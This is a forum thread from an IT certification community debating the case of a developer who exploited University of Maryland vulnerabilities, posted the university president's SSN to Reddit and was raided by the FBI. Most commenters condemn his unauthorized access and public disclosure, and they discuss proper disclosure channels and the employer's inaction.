Amateur pentester exploits client vulnerability, gets his door kicked in by FBI

aftereffectoraftereffector Member Posts: 525
This is why they say that the number one rule of pentesting is to get senior management approval in writing.

In his words: How a whitehat hacked a university and became an FBI target | Ars Technica

Basically, a guy who worked as a developer (for a company that had the University of Maryland as a client) realized that the university had some major security vulnerabilities that exposed a database full of SSNs and other PII. After he realized that his company wasn't planning to do anything about the vulnerability, this guy exploited it and posted some of the information, including the university president's SSN, to Reddit. Then the FBI kicked in his door...
CCIE Security - this one might take a while...

Comments

  • GarudaMinGarudaMin Member Posts: 204
    I didn't read the article. But based on what you wrote, this has nothing to do with getting approval in writing. This is about ethics of that developer. Even if one is frustrated in the fact that his/her company is not doing anything, it is not the right way to expose those the way that developer did.
  • ratbuddyratbuddy Member Posts: 665
    What an absolute moron. He broke the law, simple as that.
  • iBrokeITiBrokeIT GICSP, GCIP, GXPN, GPEN, GWAPT, GCFE, GCIA, GCIH, GSEC, CySA+, Sec+, eJPT Member Posts: 1,309 ■■■■■■■■■□
    That guy was getting paid as a professional but acted like an amateur in many ways. He certainly had the technical skills and knowledge to be a professional but he lacked the maturity and communication skills to effectively get his point across. I really have a hard time feeling sympathy for him.

    Starting to see this more and more where "IT pros" get too emotionally attached to the network they are paid to manage leading to their down fall and possibly ruining their careers. Anyone remember Terry Childs?
    2019: GPEN | GCFE | GXPN | GICSP | CySA+ 
    2020: GCIP | GCIA | eCPPT | eWPT | eCTHP

    WGU BS IT-NA | SANS Grad Cert: PT&EH | SANS Grad Cert: ICS Security
  • chopstickschopsticks Member Posts: 389
    Agree. That's rule No. 1 before any pentesting can be carried out. It's a regrettable thing because his guy meant well and is talented.
  • NovaHaxNovaHax Member Posts: 502 ■■■■□□□□□□
    He definitely didn't approach it correctly. It may have even been overlooked if he delivered the information to the right person in confidence. But disclosing to Reddit DOES NOT make you a white-hat.
  • stryder144stryder144 Senior Member Member Posts: 1,684 ■■■■■■■■□□
    Pure and simple, he is an idiot. I think he wanted to be congratulated but the information fell on deaf ears. Not an uncommon issue. To take things into his own hands, and posting it publicly, is plain wrong.
    The easiest thing to be in the world is you. The most difficult thing to be is what other people want you to be. Don't let them put you in that position. ~ Leo Buscaglia

    Connect With Me || My Blog Site || Follow Me
  • tpatt100tpatt100 Member Posts: 2,991 ■■■■■■■■■□
    Sounds like somebody had some issues with not being taken seriously.
  • ShdwmageShdwmage Member Posts: 374
    He wanted to be hailed a hero like the traitor Edward Snowden. He crossed a line one simply doesn't walk back over. There are many different moronic things he could have done that wouldn't have landed him in as hot of water.

    Truth be told if I found a security breach so severe and it wasn't being addressed I would feel compelled to do something. I'd go the media as an anonymous source, but I wouldn't show them any of the social security numbers or anything like that. Especially in a case of a large amount of valuable data to be exposed.

    Frankly I'm of the belief that all breaches to security leading to the possible leak of data should be reported publically. So many companies don't care about our privacy, and only worry about their bottom line. The only way its going to get better is if people start speaking up more. Until it affects their bottom line, most companies won't move on it.
    --
    “Hey! Listen!” ~ Navi
    2013: [x] MCTS 70-680
    2014: [x] 22-801 [x] 22-802 [x] CIW Web Foundation Associate
    2015 Goals: [] 70-410
  • jesseou812jesseou812 Member Posts: 60 ■■□□□□□□□□
    Shdwmage wrote: »
    He wanted to be hailed a hero like the traitor Edward Snowden. He crossed a line one simply doesn't walk back over. There are many different moronic things he could have done that wouldn't have landed him in as hot of water.

    Truth be told if I found a security breach so severe and it wasn't being addressed I would feel compelled to do something. I'd go the media as an anonymous source, but I wouldn't show them any of the social security numbers or anything like that. Especially in a case of a large amount of valuable data to be exposed.

    Frankly I'm of the belief that all breaches to security leading to the possible leak of data should be reported publically. So many companies don't care about our privacy, and only worry about their bottom line. The only way its going to get better is if people start speaking up more. Until it affects their bottom line, most companies won't move on it.

    ^^^ T h i s ^^^
  • DevilryDevilry Member Posts: 668
    I don't hardly even know what to say, seems very immature; unprofessional doesn't even begin to describe it.
  • it_consultantit_consultant Member Posts: 1,903
    I read the whole article with interest and while I agree that the developer's actions were immature. He was able to hack UMD by googling known PHP scripts called "upload" and found those scripts - from the outside - installed by another hacker. This was after he informed his company of another malicious PHP script he found because he FTP'd the website to his computer and it set off alarm bells on his desktop AV software. In other words, he had to rattle a tree very loudly to get them to pay attention. I would have gone to a newspaper instead of reddit, but I would have gone public.
  • eansdadeansdad Member Posts: 775 ■■■■□□□□□□
    I read the whole article with interest and while I agree that the developer's actions were immature. He was able to hack UMD by googling known PHP scripts called "upload" and found those scripts - from the outside - installed by another hacker. This was after he informed his company of another malicious PHP script he found because he FTP'd the website to his computer and it set off alarm bells on his desktop AV software. In other words, he had to rattle a tree very loudly to get them to pay attention. I would have gone to a newspaper instead of reddit, but I would have gone public.

    You have to remember that even though you know your neighbor has the fake rock where they hide their key next to the door doesn't mean you can go inside. I believe it was Adrian Lamo that hacked sites by going through their own links. What this guy did was stupid. He didn't like the speed at which they were fixing his found security holes so he decided to poke around some more. He should have chalked up the 1st victory on his resume and left it at that. Maybe applied for or tried to move to a security position to work on this issue. His action warrant the unemployment regardless of his intentions simply because if they allowed him to do it then others might try also. He shouldn't be prosecuted, as long as they can back up his story of it was already their and he found it. He might never get a coding job again but maybe he can parlay his recent publicity into a security position with a firm that is willing to take the time to go over proper procedures and boundaries.
  • aftereffectoraftereffector Member Posts: 525
    Maybe - but I definitely wouldn't hire him for any security job. He strikes me as a vigilante and a liability, not an asset, regardless of his skills.
    CCIE Security - this one might take a while...
  • BryzeyBryzey Member Posts: 260
    What about the company?

    It's irresponsible to bury your head in the sand when someone brings a problem to you.. Especially considering how valuable information is these days.
  • colemiccolemic Member Posts: 1,568 ■■■■■■■□□□
    He also publicly exposed PII. It might have been just one person (college president) but that is one too many, and it was reckless and irresponsible. Given the visibility of this, he will have the book thrown at him - hard.
    Working on: CCSP, definitely, maybe. On the twitters: @mcole1008
  • it_consultantit_consultant Member Posts: 1,903
    Bryzey wrote: »
    What about the company?

    It's irresponsible to bury your head in the sand when someone brings a problem to you.. Especially considering how valuable information is these days.

    I lean towards this a little bit too, the problem was he went to reddit - bad move. He should have gone to the State Attorney General or Inspector General or even the police. He had evidence of criminal activity (the uploaded scripts he utilized) so there were other avenues he could have pursued. I am less inclined to think he should have the book thrown at him, the real problem is/was the University.
  • YFZbluYFZblu Member Posts: 1,462 ■■■■■■■■□□
    Ah, ColdFusion - The gift that keeps on giving. Two thoughts:

    1. I actually feel really bad for his wife, who's life as she knows it is crashing down on her.
    2. Disclosure sucks - I used to get up in arms when I would see things like this during the course of my work. I'm not going to blame him for what he did, because I know how easy it is to get to your tipping point. A smarter move would have been to go to the FBI, IMO.
  • linuxloverlinuxlover Banned Posts: 228
    ^^ Disclosure of confidential data for greater good is one thing, revealing some personal information of your boss is just stupid. How do you ever expect to be working again after something like this? Didn't he think about what's going to happen after he clicks the Send button? Jesus Christ, some people are seriously stupid.
  • bobloblawbobloblaw Member Posts: 228
    Dumb dumb dumb dumb dumb dumb.
  • MTciscoguyMTciscoguy Member Posts: 552
    I have to say, the exuberance of youth has clouded this persons mind, there are better ways to expose security problems without black listing yourself for the rest of your life. Technology information has a way with sticking with your forever, this was not a smart move on his part, all of that work down the tubes, even hacking for the greater good is really bad in this day and age.
    Current Lab: 4 C2950 WS, 1 C2950G EI, 3 1841, 2 2503, Various Modules, Parts and Pieces. Dell Power Edge 1850, Dell Power Edge 1950.
  • DAVID QDAVID Q Member Posts: 25 ■■■□□□□□□□
    This is a and example of an individual being stupid-smart and smart-stupid. I myself can somewhat relate to this guy even though I'm not a hacker. I think he meant to use some form of common-sense a combination of ( logic & emotions ) to make the best decision , but being a busy-body and arrognant while seeking fame and attention at the same time dominanted this testers mental make-up when it came to making a life turning career decision at the end of the day.

    Like I said before this is a bad case of when smart people make dumb decisions. It may even have something to do with emotional-intelligence I don't know someone tell me?
Sign In or Register to comment.